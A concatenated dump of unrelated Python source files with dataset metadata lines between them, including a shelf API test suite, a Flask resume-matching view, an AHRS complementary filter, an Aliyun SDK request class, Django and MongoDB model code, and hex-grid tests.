from loaner.web_app.backend.api.messages import shared_messages
from loaner.web_app.backend.api.messages import shelf_messages
from loaner.web_app.backend.models import device_model
from loaner.web_app.backend.models import shelf_model # pylint: disable=unused-import
from loaner.web_app.backend.testing import loanertest
class ShelfApiTest(parameterized.TestCase, loanertest.EndpointsTestCase):
"""Test for the Shelf API."""
def setUp(self):
super(ShelfApiTest, self).setUp()
self.patcher_directory = mock.patch(
'__main__.device_model.directory.DirectoryApiClient')
self.mock_directoryclass = self.patcher_directory.start()
self.addCleanup(self.patcher_directory.stop)
self.service = shelf_api.ShelfApi()
self.login_admin_endpoints_user()
self.patcher_xsrf = mock.patch(
'__main__.shelf_api.root_api.Service.check_xsrf_token')
self.shelf = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='NYC', capacity=10,
friendly_name='GnG', latitude=40.6892534, longitude=-74.0466891,
altitude=1.0)
shelf1 = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='MTV', capacity=20)
shelf2 = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='SAO', capacity=10)
self.disabled_shelf = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='SVL', capacity=10,
friendly_name='Bay')
self.disabled_shelf.disable(loanertest.USER_EMAIL)
self.shelf_locations = [
self.shelf.location, shelf1.location, shelf2.location,
self.disabled_shelf.location]
self.device1_key = device_model.Device(
serial_number='12345',
enrolled=True,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_1',
damaged=False,
).put()
self.device2_key = device_model.Device(
serial_number='54321',
enrolled=True,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_2',
damaged=False,
).put()
self.device3_key = device_model.Device(
serial_number='67890',
enrolled=True,
shelf=self.shelf.key,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_3',
damaged=False,
).put()
self.device4_key = device_model.Device(
serial_number='ABC123',
enrolled=True,
shelf=self.shelf.key,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_4',
damaged=False,
).put()
self.device_identifiers = [
self.device1_key.get().serial_number,
self.device2_key.get().serial_number,
self.device3_key.get().serial_number]
def tearDown(self):
super(ShelfApiTest, self).tearDown()
self.service = None
@mock.patch('__main__.root_api.Service.check_xsrf_token')
@mock.patch('__main__.shelf_model.Shelf.enroll')
def test_enroll(self, mock_enroll, mock_xsrf_token):
"""Test Enroll with mock methods."""
request = shelf_messages.EnrollShelfRequest(
location='nyc', capacity=100, friendly_name='test', latitude=12.5,
longitude=12.5, altitude=2.0, responsible_for_audit='precise',
audit_interval_override=33, audit_notification_enabled=True)
response = self.service.enroll(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertIsInstance(response, message_types.VoidMessage)
def test_enroll_bad_request(self):
request = shelf_messages.EnrollShelfRequest(capacity=10)
with self.assertRaisesRegexp(
shelf_api.endpoints.BadRequestException,
'Entity has uninitialized properties'):
self.service.enroll(request)
request = shelf_messages.EnrollShelfRequest(
location='nyc', capacity=10, latitude=12.5)
with self.assertRaisesRegexp(
shelf_api.endpoints.BadRequestException,
shelf_model._LAT_LONG_MSG):
self.service.enroll(request)
@mock.patch('__main__.root_api.Service.check_xsrf_token')
def test_get_by_location(self, mock_xsrf_token):
request = shelf_messages.ShelfRequest(location='NYC')
response = self.service.get(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertEqual(self.shelf.location, response.location)
self.assertEqual(self.shelf.friendly_name, response.friendly_name)
def test_disable_by_location(self):
request = shelf_messages.ShelfRequest(location='NYC')
self.assertTrue(self.shelf.enabled)
response = self.service.disable(request)
self.assertFalse(self.shelf.enabled)
self.assertIsInstance(response, message_types.VoidMessage)
@mock.patch('__main__.root_api.Service.check_xsrf_token')
def test_update_using_location(self, mock_xsrf_token):
request = shelf_messages.UpdateShelfRequest(
shelf_request=shelf_messages.ShelfRequest(location='NYC'),
location='NYC-9th')
response = self.service.update(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertEqual(self.shelf.location, 'NYC-9th')
shelf = shelf_model.Shelf.get(friendly_name='GnG')
self.assertEqual(shelf.location, 'NYC-9th')
self.assertIsInstance(response, message_types.VoidMessage)
@parameterized.parameters(
(shelf_messages.Shelf(capacity=10), 2,),
(shelf_messages.Shelf(enabled=False), 1,),
(shelf_messages.Shelf(
query=shared_messages.SearchRequest(
query_string='enabled:True capacity:10')), 2,),
(shelf_messages.Shelf(
query=shared_messages.SearchRequest(
query_string='enabled:False')), 1,))
@mock.patch('__main__.root_api.Service.check_xsrf_token')
def test_list_shelves(self, request, response_length, mock_xsrf_token):
response = self.service.list_shelves(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertEqual(response_length, len(response.shelves))
def test_list_shelves_invalid_page_size(self):
with self.assertRaises(endpoints.BadRequestException):
request = shelf_messages.Shelf(page_size=0)
self.service.list_shelves(request)
def test_list_shelves_with_search_constraints(self):
expressions = shared_messages.SearchExpression(expression='location')
expected_response = shelf_messages.ListShelfResponse(
shelves=[shelf_messages.Shelf(
location=self.shelf.location,
shelf_request=shelf_messages.ShelfRequest(
location=self.shelf.location,
urlsafe_key=self.shelf.key.urlsafe()))],
total_results=1, total_pages=1)
request = shelf_messages.Shelf(
query=shared_messages.SearchRequest(
query_string='location:NYC',
expressions=[expressions],
returned_fields=['location']))
response = self.service.list_shelves(request)
self.assertEqual(response, expected_response)
def test_list_shelves_with_offset(self):
previouse_shelf_locations = []
request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=1)
response = self.service.list_shelves(request)
self.assertEqual(len(response.shelves), 1)
previouse_shelf_locations.append(response.shelves[0].location)
# Get next page results and make sure it's not the same as last.
request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=2)
response = self.service.list_shelves(request)
self.assertEqual(len(response.shelves), 1)
self.assertNotIn(response.shelves[0], previouse_shelf_locations)
previouse_shelf_locations.append(response.shelves[0].location)
# Get next page results and make sure it's not the same as last 2.
request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=3)
response = self.service.list_shelves(request)
self.assertEqual(len(response.shelves), 1)
self.assertNotIn(response.shelves[0], previouse_shelf_locations)
previouse_shelf_locations.append(response.shelves[0].location)
@mock.patch('__main__.root_api.Service.check_xsrf_token')
@mock.patch('__main__.shelf_api.logging.info')
def test_audit_using_shelf_location(self, mock_logging, mock_xsrf_token):
request = shelf_messages.ShelfAuditRequest(
shelf_request=shelf_messages.ShelfRequest(location='NYC'),
device_identifiers=self.device_identifiers)
response = self.service.audit(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
mock_logging.assert_called()
for identifier in self.device_identifiers:
datastore_device = device_model.Device.get(serial_number=identifier)
self.assertEqual(datastore_device.shelf.get().location, 'NYC')
self.assertFalse(self.shelf.audit_requested)
self.assertEqual(self.shelf.last_audit_by, loanertest.SUPER_ADMIN_EMAIL)
self.assertIsInstance(response, message_types.VoidMessage)
def test_audit_invalid_device(self):
request = shelf_messages.ShelfAuditRequest(
shelf_request=shelf_messages.ShelfRequest(location='NYC'),
device_identifiers=['Invalid'])
with self.assertRaisesRegexp(
endpoints.NotFoundException,
shelf_api._DEVICE_DOES_NOT_EXIST_MSG % 'Invalid'):
self.service.audit(request)
@mock.patch.object(device_model.Device, 'search')
@mock.patch.object(shelf_api, 'get_shelf', autospec=True)
def test_audit_remove_devices(
self, mock_get_shelf, mock_model_device_search):
shelf = self.device2_key.get()
shelf.shelf = self.shelf.key
shelf.put()
mock_model_device_search.return_value = (
search.SearchResults(
results=[
search.ScoredDocument(
doc_id=self.device2_key.urlsafe()),
search.ScoredDocument(
doc_id=self.device3_key.urlsafe()),
search.ScoredDocument(
doc_id=self.device4_key.urlsafe())],
number_found=3))
mock_get_shelf.return_value = self.shelf
request = shelf_messages.ShelfAuditRequest(
shelf_request=shelf_messages.ShelfRequest(location=self.shelf.location),
device_identifiers=[self.device3_key.get().serial_number])
self.service.audit(request)
self.assertEqual(self.device3_key.get().shelf, self.shelf.key)
self.assertIsNone(self.device2_key.get().shelf)
self.assertIsNone(self.device4_key.get().shelf)
def test_get_shelf_urlsafe_key(self):
"""Test getting a shelf using the urlsafe key."""
request = shelf_messages.ShelfRequest(urlsafe_key=self.shelf.key.urlsafe())
shelf = shelf_api.get_shelf(request)
self.assertEqual(shelf, self.shelf)
def test_get_shelf_using_location(self):
"""Test getting a shelf using the location."""
request = shelf_messages.ShelfRequest(location=self.shelf.location)
shelf = shelf_api.get_shelf(request)
self.assertEqual(shelf, self.shelf)
def test_get_shelf_using_location_error(self):
"""Test getting a shelf with an invalid location."""
request = shelf_messages.ShelfRequest(location='Not_Valid')
with self.assertRaisesRegexp(
endpoints.NotFoundException,
shelf_api._SHELF_DOES_NOT_EXIST_MSG % request.location):
shelf_api.get_shelf(request)
if __name__ == '__main__':
loanertest.main()
| 1.679688 | 2 |
app/views/main.py | ArmandDS/ai_bert_resumes | 1 | 7864 | from flask import render_template, jsonify, Flask, redirect, url_for, request
from app import app
import random
import os
# import tensorflow as tf
# import numpy as np
# import sys
# import spacy
# nlp = spacy.load('en')
# sys.path.insert(0, "/content/bert_experimental")
# from bert_experimental.finetuning.text_preprocessing import build_preprocessor
# from bert_experimental.finetuning.graph_ops import load_graph
# restored_graph = load_graph("models/frozen_graph.pb")
# graph_ops = restored_graph.get_operations()
# input_op, output_op = graph_ops[0].name, graph_ops[-1].name
# x = restored_graph.get_tensor_by_name(input_op + ':0')
# y = restored_graph.get_tensor_by_name(output_op + ':0')
# preprocessor = build_preprocessor("./uncased_L-12_H-768_A-12/vocab.txt", 256)
# py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32], name='preprocessor')
# py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32])
# sess = tf.Session(graph=restored_graph)
# delimiter = " ||| "
@app.route('/')
def index1():
return render_template('index.html', title='Home')
@app.route('/predict', methods = ['GET', 'POST'])
def upload_file():
if request.method == 'POST':
exp_st = request.form.get('exp')
job_st = request.form.get('job')
# y_out = sess.run(y, feed_dict={
# x: pd.DataFrame([delimiter.join((exp_st, job_st ))], columns=['name'])
# })
# doc1 = nlp(exp_st)
# doc2 = nlp(job_st )
# y_out2 = doc1.similarity(doc2)
return render_template('index.html', title='Success', predictions=80, predictions_sp =75, exp=exp_st, job= job_st)
@app.route('/index')
def index():
return render_template('index.html', title='Home')
@app.route('/map')
def map():
return render_template('map.html', title='Map')
@app.route('/map/refresh', methods=['POST'])
def map_refresh():
points = [(random.uniform(48.8434100, 48.8634100),
random.uniform(2.3388000, 2.3588000))
for _ in range(random.randint(2, 9))]
return jsonify({'points': points})
@app.route('/contact')
def contact():
return render_template('contact.html', title='Contact') | 2.21875 | 2 |
ahrs/filters/complementary.py | jaluebbe/ahrs | 0 | 7865 | # -*- coding: utf-8 -*-
"""
Complementary Filter
====================
Attitude quaternion obtained with gyroscope and accelerometer-magnetometer
measurements, via complementary filter.
First, the current orientation is estimated at time :math:`t`, from a previous
orientation at time :math:`t-1`, and a given angular velocity,
:math:`\\omega`, in rad/s.
This orientation is computed by numerically integrating the angular velocity
and adding it to the previous orientation, which is known as an **attitude
propagation**.
.. math::
\\begin{array}{rcl}
\\mathbf{q}_\\omega &=& \\Big(\\mathbf{I}_4 + \\frac{\\Delta t}{2}\\boldsymbol\\Omega_t\\Big)\\mathbf{q}_{t-1} \\\\
&=&
\\begin{bmatrix}
1 & -\\frac{\\Delta t}{2}\\omega_x & -\\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z \\\\
\\frac{\\Delta t}{2}\\omega_x & 1 & \\frac{\\Delta t}{2}\\omega_z & -\\frac{\\Delta t}{2}\\omega_y \\\\
\\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z & 1 & \\frac{\\Delta t}{2}\\omega_x \\\\
\\frac{\\Delta t}{2}\\omega_z & \\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_x & 1
\\end{bmatrix}
\\begin{bmatrix}q_w \\\\ q_x \\\\ q_y \\\\ q_z \\end{bmatrix} \\\\
&=&
\\begin{bmatrix}
q_w - \\frac{\\Delta t}{2} \\omega_x q_x - \\frac{\\Delta t}{2} \\omega_y q_y - \\frac{\\Delta t}{2} \\omega_z q_z\\\\
q_x + \\frac{\\Delta t}{2} \\omega_x q_w - \\frac{\\Delta t}{2} \\omega_y q_z + \\frac{\\Delta t}{2} \\omega_z q_y\\\\
q_y + \\frac{\\Delta t}{2} \\omega_x q_z + \\frac{\\Delta t}{2} \\omega_y q_w - \\frac{\\Delta t}{2} \\omega_z q_x\\\\
q_z - \\frac{\\Delta t}{2} \\omega_x q_y + \\frac{\\Delta t}{2} \\omega_y q_x + \\frac{\\Delta t}{2} \\omega_z q_w
\\end{bmatrix}
\\end{array}
Secondly, the *tilt* is computed from the accelerometer measurements as:
.. math::
\\begin{array}{rcl}
\\theta &=& \\mathrm{arctan2}(a_y, a_z) \\\\
\\phi &=& \\mathrm{arctan2}\\big(-a_x, \\sqrt{a_y^2+a_z^2}\\big)
\\end{array}
Only the pitch, :math:`\\phi`, and roll, :math:`\\theta`, angles are computed,
leaving the yaw angle, :math:`\\psi` equal to zero.
If a magnetometer sample is available, the yaw angle can be computed. First
compensate the measurement using the *tilt*:
.. math::
\\begin{array}{rcl}
\\mathbf{b} &=&
\\begin{bmatrix}
\\cos\\theta & \\sin\\theta\\sin\\phi & \\sin\\theta\\cos\\phi \\\\
0 & \\cos\\phi & -\\sin\\phi \\\\
-\\sin\\theta & \\cos\\theta\\sin\\phi & \\cos\\theta\\cos\\phi
\\end{bmatrix}
\\begin{bmatrix}m_x \\\\ m_y \\\\ m_z\\end{bmatrix} \\\\
\\begin{bmatrix}b_x \\\\ b_y \\\\ b_z\\end{bmatrix} &=&
\\begin{bmatrix}
m_x\\cos\\theta + m_y\\sin\\theta\\sin\\phi + m_z\\sin\\theta\\cos\\phi \\\\
m_y\\cos\\phi - m_z\\sin\\phi \\\\
-m_x\\sin\\theta + m_y\\cos\\theta\\sin\\phi + m_z\\cos\\theta\\cos\\phi
\\end{bmatrix}
\\end{array}
Then, the yaw angle, :math:`\\psi`, is obtained as:
.. math::
\\begin{array}{rcl}
\\psi &=& \\mathrm{arctan2}(-b_y, b_x) \\\\
&=& \\mathrm{arctan2}\\big(m_z\\sin\\phi - m_y\\cos\\phi, \\; m_x\\cos\\theta + \\sin\\theta(m_y\\sin\\phi + m_z\\cos\\phi)\\big)
\\end{array}
We transform the roll-pitch-yaw angles to a quaternion representation:
.. math::
\\mathbf{q}_{am} =
\\begin{pmatrix}q_w\\\\q_x\\\\q_y\\\\q_z\\end{pmatrix} =
\\begin{pmatrix}
\\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\
\\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) - \\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\
\\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\
\\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) - \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big)
\\end{pmatrix}
Finally, after each orientation is estimated independently, they are fused with
the complementary filter.
.. math::
\\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am}
where :math:`\\mathbf{q}_\\omega` is the attitude estimated from the gyroscope,
:math:`\\mathbf{q}_{am}` is the attitude estimated from the accelerometer and
the magnetometer, and :math:`\\alpha` is the gain of the filter.
The filter gain must be a floating value within the range :math:`[0.0, 1.0]`.
It can be seen that when :math:`\\alpha=1`, the attitude is estimated entirely
with the accelerometer and the magnetometer. When :math:`\\alpha=0`, it is
estimated solely with the gyroscope. The values within the range decide how
much of each estimation is "blended" into the quaternion.
This is actually a simple implementation of `LERP
<https://en.wikipedia.org/wiki/Linear_interpolation>`_ commonly used to
linearly interpolate quaternions with small differences between them.
"""
import numpy as np
from ..common.orientation import ecompass
class Complementary:
"""
Complementary filter for attitude estimation as quaternion.
Parameters
----------
gyr : numpy.ndarray, default: None
N-by-3 array with measurements of angular velocity, in rad/s.
acc : numpy.ndarray, default: None
N-by-3 array with measurements of acceleration, in m/s^2.
mag : numpy.ndarray, default: None
N-by-3 array with measurements of magnetic field, in mT.
frequency : float, default: 100.0
Sampling frequency in Herz.
Dt : float, default: 0.01
Sampling step in seconds. Inverse of sampling frequency. Not required
if ``frequency`` value is given.
gain : float, default: 0.1
Filter gain.
q0 : numpy.ndarray, default: None
Initial orientation, as a versor (normalized quaternion).
Raises
------
ValueError
When dimension of input arrays ``acc``, ``gyr``, or ``mag`` are not equal.
"""
def __init__(self,
gyr: np.ndarray = None,
acc: np.ndarray = None,
mag: np.ndarray = None,
frequency: float = 100.0,
gain = 0.9,
**kwargs):
self.gyr: np.ndarray = gyr
self.acc: np.ndarray = acc
self.mag: np.ndarray = mag
self.frequency: float = frequency
self.gain: float = gain
if not(0.0 <= self.gain <= 1.0):
raise ValueError(f"Filter gain must be in the range [0, 1]. Got {self.gain}")
self.Dt: float = kwargs.get('Dt', 1.0/self.frequency)
self.q0: np.ndarray = kwargs.get('q0')
# Process of given data
if self.gyr is not None and self.acc is not None:
self.Q = self._compute_all()
def _compute_all(self) -> np.ndarray:
"""
Estimate the quaternions given all data
Attributes ``gyr``, ``acc`` and, optionally, ``mag`` must contain data.
Returns
-------
Q : numpy.ndarray
M-by-4 Array with all estimated quaternions, where M is the number
of samples.
"""
if self.acc.shape != self.gyr.shape:
raise ValueError("acc and gyr are not the same size")
num_samples = len(self.acc)
Q = np.zeros((num_samples, 4))
if self.mag is None:
self.mag = [None]*num_samples
else:
if self.mag.shape != self.gyr.shape:
raise ValueError("mag and gyr are not the same size")
Q[0] = self.am_estimation(self.acc[0], self.mag[0]) if self.q0 is None else self.q0.copy()
for t in range(1, num_samples):
Q[t] = self.update(Q[t-1], self.gyr[t], self.acc[t], self.mag[t])
return Q
def attitude_propagation(self, q: np.ndarray, omega: np.ndarray, dt: float) -> np.ndarray:
"""
Attitude propagation of the orientation.
Estimate the current orientation at time :math:`t`, from a given
orientation at time :math:`t-1` and a given angular velocity,
:math:`\\omega`, in rad/s.
It is computed by numerically integrating the angular velocity and
adding it to the previous orientation.
Parameters
----------
q : numpy.ndarray
A-priori quaternion.
omega : numpy.ndarray
Tri-axial angular velocity, in rad/s.
dt : float
Time step, in seconds, between consecutive Quaternions.
Returns
-------
q_omega : numpy.ndarray
Estimated orientation, as quaternion.
"""
w = -0.5*dt*omega
A = np.array([
[1.0, -w[0], -w[1], -w[2]],
[w[0], 1.0, w[2], -w[1]],
[w[1], -w[2], 1.0, w[0]],
[w[2], w[1], -w[0], 1.0]])
q_omega = A @ q
return q_omega / np.linalg.norm(q_omega)
def am_estimation(self, acc: np.ndarray, mag: np.ndarray = None) -> np.ndarray:
"""
Attitude estimation from an Accelerometer-Magnetometer architecture.
Parameters
----------
acc : numpy.ndarray
Tri-axial sample of the accelerometer.
mag : numpy.ndarray, default: None
Tri-axial sample of the magnetometer.
Returns
-------
q_am : numpy.ndarray
Estimated attitude.
"""
return ecompass(acc, mag, frame='NED', representation='quaternion')
def update(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray = None, dt: float = None) -> np.ndarray:
"""
Attitude Estimation from given measurements and previous orientation.
The new orientation is first estimated with the angular velocity, then
another orientation is computed using the accelerometers and
magnetometers. The magnetometer is optional.
Each orientation is estimated independently and fused with a
complementary filter.
.. math::
\\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am}
Parameters
----------
q : numpy.ndarray
A-priori quaternion.
gyr : numpy.ndarray
Sample of tri-axial Gyroscope in rad/s.
acc : numpy.ndarray
Sample of tri-axial Accelerometer in m/s^2.
mag : numpy.ndarray, default: None
Sample of tri-axial Magnetometer in uT.
dt : float, default: None
Time step, in seconds, between consecutive Quaternions.
Returns
-------
q : numpy.ndarray
Estimated quaternion.
"""
dt = self.Dt if dt is None else dt
if gyr is None or not np.linalg.norm(gyr) > 0:
return q
q_omega = self.attitude_propagation(q, gyr, dt)
q_am = self.am_estimation(acc, mag)
# Complementary Estimation
if np.linalg.norm(q_omega + q_am) < np.sqrt(2):
q = (1.0 - self.gain)*q_omega - self.gain*q_am
else:
q = (1.0 - self.gain)*q_omega + self.gain*q_am
return q/np.linalg.norm(q)
| 2.515625 | 3 |
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 7866 | <gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkehpc.endpoint import endpoint_data
class EditJobTemplateRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'EHPC', '2018-04-12', 'EditJobTemplate')
self.set_method('GET')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StderrRedirectPath(self):
return self.get_query_params().get('StderrRedirectPath')
def set_StderrRedirectPath(self,StderrRedirectPath):
self.add_query_param('StderrRedirectPath',StderrRedirectPath)
def get_ClockTime(self):
return self.get_query_params().get('ClockTime')
def set_ClockTime(self,ClockTime):
self.add_query_param('ClockTime',ClockTime)
def get_CommandLine(self):
return self.get_query_params().get('CommandLine')
def set_CommandLine(self,CommandLine):
self.add_query_param('CommandLine',CommandLine)
def get_ArrayRequest(self):
return self.get_query_params().get('ArrayRequest')
def set_ArrayRequest(self,ArrayRequest):
self.add_query_param('ArrayRequest',ArrayRequest)
def get_PackagePath(self):
return self.get_query_params().get('PackagePath')
def set_PackagePath(self,PackagePath):
self.add_query_param('PackagePath',PackagePath)
def get_Mem(self):
return self.get_query_params().get('Mem')
def set_Mem(self,Mem):
self.add_query_param('Mem',Mem)
def get_StdoutRedirectPath(self):
return self.get_query_params().get('StdoutRedirectPath')
def set_StdoutRedirectPath(self,StdoutRedirectPath):
self.add_query_param('StdoutRedirectPath',StdoutRedirectPath)
def get_Variables(self):
return self.get_query_params().get('Variables')
def set_Variables(self,Variables):
self.add_query_param('Variables',Variables)
def get_RunasUser(self):
return self.get_query_params().get('RunasUser')
def set_RunasUser(self,RunasUser):
self.add_query_param('RunasUser',RunasUser)
def get_ReRunable(self):
return self.get_query_params().get('ReRunable')
def set_ReRunable(self,ReRunable):
self.add_query_param('ReRunable',ReRunable)
def get_Thread(self):
return self.get_query_params().get('Thread')
def set_Thread(self,Thread):
self.add_query_param('Thread',Thread)
def get_TemplateId(self):
return self.get_query_params().get('TemplateId')
def set_TemplateId(self,TemplateId):
self.add_query_param('TemplateId',TemplateId)
def get_Priority(self):
return self.get_query_params().get('Priority')
def set_Priority(self,Priority):
self.add_query_param('Priority',Priority)
def get_Gpu(self):
return self.get_query_params().get('Gpu')
def set_Gpu(self,Gpu):
self.add_query_param('Gpu',Gpu)
def get_Node(self):
return self.get_query_params().get('Node')
def set_Node(self,Node):
self.add_query_param('Node',Node)
def get_Task(self):
return self.get_query_params().get('Task')
def set_Task(self,Task):
self.add_query_param('Task',Task)
def get_Name(self):
return self.get_query_params().get('Name')
def set_Name(self,Name):
self.add_query_param('Name',Name)
def get_Queue(self):
return self.get_query_params().get('Queue')
def set_Queue(self,Queue):
self.add_query_param('Queue',Queue) | 1.632813 | 2 |
tests/common/models/test_execution.py | angry-tony/ceph-lcm-decapod | 41 | 7867 | # -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for decapod_common.models.execution."""
import pytest
from decapod_common.models import execution
def test_create(new_execution, new_pcmodel, pymongo_connection):
db_model = pymongo_connection.db.execution.find_one(
{"_id": new_execution._id}
)
assert db_model
assert new_execution.model_id == db_model["model_id"]
assert new_execution.version == db_model["version"]
assert new_execution.time_created == db_model["time_created"]
assert new_execution.time_deleted == db_model["time_deleted"]
assert new_execution.initiator_id == db_model["initiator_id"]
assert new_execution.playbook_configuration_model_id == \
db_model["pc_model_id"]
assert new_execution.playbook_configuration_version == \
db_model["pc_version"]
assert new_execution.state.name == db_model["state"]
assert new_execution.state == execution.ExecutionState.created
assert new_execution.playbook_configuration_model_id == \
new_pcmodel.model_id
assert new_execution.playbook_configuration_version == \
new_pcmodel.version
@pytest.mark.parametrize("state", execution.ExecutionState)
def test_change_state_ok(state, new_execution):
new_execution.state = state
new_execution.save()
assert new_execution.state == state
@pytest.mark.parametrize("state", (
"", "changed", "started", 0, None, -1.0, [], {}, object(), set()
))
def test_change_state_fail(state, new_execution):
with pytest.raises(ValueError):
new_execution.state = state
@pytest.mark.parametrize("state", execution.ExecutionState)
def test_api_response(state, new_pcmodel, new_execution):
new_execution.state = state
new_execution.save()
assert new_execution.make_api_structure() == {
"id": new_execution.model_id,
"initiator_id": new_execution.initiator_id,
"time_deleted": new_execution.time_deleted,
"time_updated": new_execution.time_created,
"model": execution.ExecutionModel.MODEL_NAME,
"version": 2,
"data": {
"playbook_configuration": {
"id": new_pcmodel.model_id,
"version": new_pcmodel.version,
"playbook_name": new_pcmodel.playbook_id
},
"state": state.name
}
}
def test_getting_logfile(new_execution, execution_log_storage):
new_execution.logfile
execution_log_storage.get.assert_called_once_with(new_execution.model_id)
def test_create_logfile(new_execution, execution_log_storage):
new_execution.new_logfile.write("1")
execution_log_storage.delete.assert_called_once_with(
new_execution.model_id
)
execution_log_storage.new_file.assert_called_once_with(
new_execution.model_id,
filename="{0}.log".format(new_execution.model_id),
content_type="text/plain"
)
execution_log_storage.new_file().write.assert_called_once_with("1")
| 1.882813 | 2 |
board/models.py | Fahreeve/TaskManager | 0 | 7868 | from django.contrib.auth.models import User
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Task(models.Model):
CLOSE = 'cl'
CANCEL = 'ca'
LATER = 'la'
UNDEFINED = 'un'
CHOICES = (
(UNDEFINED, _("Неизвестно")),
(CLOSE, _("Завершить")),
(CANCEL, _("Отменить")),
(LATER, _("Отложить")),
)
title = models.CharField(_("Заголовок"), max_length=50)
description = models.TextField(_("Описание"))
executor = models.ForeignKey(User, verbose_name=_("Исполнитель"), on_delete=models.CASCADE)
status = models.CharField(_("Статус"), choices=CHOICES, default=UNDEFINED, max_length=2)
deadline = models.DateTimeField(_("Дедлайн"))
priority = models.IntegerField(_("Приоритет"), default=1, validators=[MinValueValidator(1), MaxValueValidator(3)])
changed = models.DateTimeField(_("Дата последнего изменения"), auto_now=True)
created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
@property
def text_status(self):
choices = dict(self.CHOICES)
return choices[self.status]
@property
def text_deadline(self):
return self.deadline.strftime("%d.%m.%Y %H:%M")
class Comment(models.Model):
task = models.ForeignKey(Task, related_name="comments", on_delete=models.CASCADE)
creator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
text = models.TextField(_('Комментарий'))
created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
| 2.0625 | 2 |
test/test_hex_line.py | bicobus/Hexy | 72 | 7869 | import numpy as np
import hexy as hx
def test_get_hex_line():
expected = [
[-3, 3, 0],
[-2, 2, 0],
[-1, 2, -1],
[0, 2, -2],
[1, 1, -2],
]
start = np.array([-3, 3, 0])
end = np.array([1, 1, -2])
print(hx.get_hex_line(start, end))
print(expected);
assert(np.array_equal(
hx.get_hex_line(start, end),
expected));
if __name__ == "__main__":
test_get_hex_line()
| 2.984375 | 3 |
wofry/propagator/propagators2D/integral.py | PaNOSC-ViNYL/wofry | 0 | 7870 | <reponame>PaNOSC-ViNYL/wofry<filename>wofry/propagator/propagators2D/integral.py
